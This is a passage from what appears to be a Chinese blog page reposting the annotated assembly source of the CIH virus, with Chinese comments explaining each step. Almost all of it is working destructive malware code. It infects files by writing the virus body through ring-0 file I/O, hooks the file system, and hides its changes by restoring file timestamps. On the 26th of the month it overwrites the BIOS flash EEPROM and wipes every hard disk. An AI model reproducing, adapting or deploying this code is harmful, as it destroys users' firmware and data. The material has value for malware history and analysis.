; *************************** lea eax, (LastVxDCallAddress-2-@9)[esi] ;上一個(gè)調(diào)用VXD的指令的地址 mov cl, VxDCallTableSize ;所用VXD調(diào)用的個(gè)數(shù) LoopOfRestoreVxDCallID: mov word ptr [eax], 20cdh ;還原成"int 20h"的形式 mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ;從VxDCallIDTable取出VXD調(diào)用的id號(hào)放到edxmov [eax+2], edx ;放到"int 20h"的后面,形成'int 20h' and the 'Service Identifier'的形式movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ;VxDCallAddressTable中放著各個(gè)調(diào)用VXD的指令的地址之差sub eax, edx ;eax為上一個(gè)調(diào)用地址 loop LoopOfRestoreVxDCallID ;還原其他的調(diào)用 ; ***************************
; * Let's Write *
; * Virus Code to the File *
; *************************** WriteVirusCodeToFile: mov eax, dr1 ;dr1為前面所保存的esp mov ebx, [eax+10h] ;ebx為保存在棧中的保存文件句柄mov edi, [eax] ;edi為保存在棧中的IFSMgr_Ring0_FileIO調(diào)用的地址LoopOfWriteVirusCodeToFile: pop ecx ;病毒代碼各段的偏移 jecxz SetFileModificationMark ;到病毒偏移零為止 mov esi, ecx mov eax, 0d601h ;寫(xiě)文件功能號(hào)(R0_WRITEFILE) pop edx ;文件指針 pop ecx ;要寫(xiě)的字節(jié)數(shù)call edi ; VXDCall IFSMgr_Ring0_FileIO ;寫(xiě)文件 ;依次寫(xiě)入:各段病毒代碼,病毒塊表,新的文件塊表,新的程序入口,感染標(biāo)志 jmp LoopOfWriteVirusCodeToFile ; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; *************************** SetFileModificationMark: pop ebx pop eax stc ; Enable CF(Carry Flag) ;設(shè)置進(jìn)位標(biāo)志 pushf ;標(biāo)志位壓棧 ; *************************************
; * Close File *
; ************************************* CloseFile: xor eax, eax mov ah, 0d7h ;關(guān)閉文件功能號(hào) call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************************
; * Need to Restore File Modification *
; * Time !? *
; ************************************* popf pop esi jnc IsKillComputer ;CF=0就KillComputer :-( ; *************************************
; * Restore File Modification Time *
; ************************************* mov ebx, edi mov ax, 4303h mov ecx, (FileModificationTime-@7)[esi] mov edi, (FileModificationTime+2-@7)[esi] call ebx ; VXDCall IFSMgr_Ring0_FileIO ;修改文件修改時(shí)間 ; *************************************
; * Disable OnBusy *
; ************************************* DisableOnBusy: dec byte ptr (OnBusy-@7)[esi] ; Disable OnBus ; *************************************
; * Call Previous FileSystemApiHook *
; ************************************* prevhook: popad ;恢復(fù)所有寄存器 mov eax, dr0 ; 保存的原來(lái)的文件系統(tǒng)鉤子程序首址 jmp [eax] ; Jump to prevhook ;跳到前一個(gè)鉤子去執(zhí)行 ; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; ************************************* pIFSFunc: ; FileSystemApiHookFunction的參數(shù)見(jiàn)助標(biāo)2mov ebx, esp ; ebx指向esp以獲得FileSystemApiHookFunction的參數(shù)地址push dword ptr [ebx+20h+04h+14h] ; Push pioreq ;把參數(shù)pioreq pir壓棧(ebx+20h+04h為參數(shù)首址) call [ebx+20h+04h] ; Call pIFSFunc ;調(diào)用pIFSFunc FSDFnAddr(FSD的功能地址) pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ;改eax的值(在棧中,20h為pushad的壓棧大小,1ch為第一個(gè)壓棧的eax) ; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h ;詳見(jiàn)助標(biāo)2 jne QuitMyVirusFileSystemHook ; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ;保存獲得的文件時(shí)間和日期 ; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; *************************** QuitMyVirusFileSystemHook: popad ;恢復(fù)所有寄存器 ret ;從病毒設(shè)置的文件鉤子程序中退出 ; *************************************
; * Kill Computer !? ... *^_^* * ;KillComputer模塊(!!十分危險(xiǎn),所以原理分析及詳細(xì)注釋暫不公布!!)
; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? ;從CMOS中獲得當(dāng)前的日期 IF DEBUG jmp DisableOnBusy
ELSE jnz DisableOnBusy
ENDIF ;如果是每月的26號(hào)就KillComputer(太危險(xiǎn)了).*^_^*.; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; ************************************** ; ***************************
; * Kill BIOS EEPROM *
; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; *********************** mov di, 0058h dec edx ; and a0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; *********************** mov ah, 0e0h mov [eax], al ; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; *********************** ; or al 0h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; ***************************
; * Enable EEPROM to Write *
; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; ***************************
; * IO for EEPROM *
; *************************** IOForEEPROM:
@10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; *********************************************************
; * Static Data *
; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO ;最后一個(gè)調(diào)用的VxD的指令的地址
VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath ;各個(gè)VxD調(diào)用指令地址之差 VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;VxD的調(diào)用號(hào)
VxDCallTableSize = ($-VxDCallIDTable)/04h ;程序中使用VxD調(diào)用的個(gè)數(shù) ; *********************************************************
; * Virus Version Copyright *
; ********************************************************* VirusVersionCopyright db 'CIH v' ;CIH病毒的標(biāo)識(shí) db MajorVirusVersion+'0' ;主版本號(hào) db '.' db MinorVirusVersion+'0' ;副版本號(hào) db ' TATUNG' ;作者名字 ; *********************************************************
; * Virus Size *
; ********************************************************* VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒代碼全長(zhǎng) ; *********************************************************
; * Dynamic Data *
; ********************************************************* VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0 ;忙標(biāo)志
FileModificationTime dd ? ;文件修改時(shí)間 FileNameBuffer db FileNameBufferSize dup(?) ;7fh長(zhǎng)的文件名數(shù)據(jù)區(qū)
@7 = FileNameBuffer DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; 塊數(shù)目
TimeDateStamp dd ? ; 文件時(shí)間
SymbolsPointer dd ? ;
NumberOfSymbols dd ? ; 符號(hào)表中符號(hào)個(gè)數(shù)
SizeOfOptionalHeader dw ? ; 可選部首長(zhǎng)度
_Characteristics dw ? ; 信息標(biāo)志
Magic dw ? ; 標(biāo)志字(總是010bh)
LinkerVersion dw ? ; 連接器版本號(hào)
SizeOfCode dd ? ; 代碼段大小
SizeOfInitializedData dd ? ; 已初始化數(shù)據(jù)塊大小
SizeOfUninitializedData dd ? ; 未初始化數(shù)據(jù)塊大小
AddressOfEntryPoint dd ? ; 程序起始RVA
BaseOfCode dd ? ; 代碼段起始RVA
BaseOfData dd ? ; 數(shù)據(jù)段起始RVA
ImageBase dd ? ; 裝入基址RVA
@9 = $
SectionAlignment dd ? ; 塊對(duì)齊
FileAlignment dd ? ; 文件塊對(duì)齊
OperatingSystemVersion dd ? ; 所需操作系統(tǒng)版本號(hào)
ImageVersion dd ? ; 用戶(hù)自定義版本號(hào)
SubsystemVersion dd ? ; 所需子系統(tǒng)版本號(hào)
Reserved dd ? ; 保留
SizeOfImage dd ? ; 文件各部分總長(zhǎng)
SizeOfHeaders dd ? ; 部首及塊表大小
SizeOfImageHeaderToRead = $-NumberOfSections ; ;
NewAddressOfEntryPoint = DataBuffer ; DWORD ;
SizeOfImageHeaderToWrite = 04h ; StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD ; 塊名
VirtualSize = StartOfSectionTable+08h ; DWORD ; 該段真實(shí)長(zhǎng)度
VirtualAddress = StartOfSectionTable+0ch ; DWORD ; 該塊的RVA
SizeOfRawData = StartOfSectionTable+10h ; DWORD ; 該塊物理長(zhǎng)度
PointerToRawData = StartOfSectionTable+14h ; DWORD ; 該塊物理偏移
PointerToRelocations = StartOfSectionTable+18h ; DWORD ; 重定位的偏移
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD ; 行號(hào)表的偏移
NumberOfRelocations = StartOfSectionTable+20h ; WORD ; 重定位項(xiàng)數(shù)目
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD ; 行號(hào)表的數(shù)目
Characteristics = StartOfSectionTable+24h ; DWORD ; 塊屬性
SizeOfScetionTable = Characteristics+04h-SectionName ; 塊表項(xiàng)的長(zhǎng)度 ; *********************************************************
; * Virus Total Need Memory *
; ********************************************************* VirusNeedBaseMemory = $ VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒所需的內(nèi)存(病毒全長(zhǎng)) ; *********************************************************
; ********************************************************* VirusGame ENDS END FileHeader ;病毒全文完
?
總結(jié)
以上是生活随笔為你收集整理的CIH病毒-邹丹注释的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 安全合规--48--基于国内法律法规的企
- 下一篇: 通过命令行脚本实现双网卡切换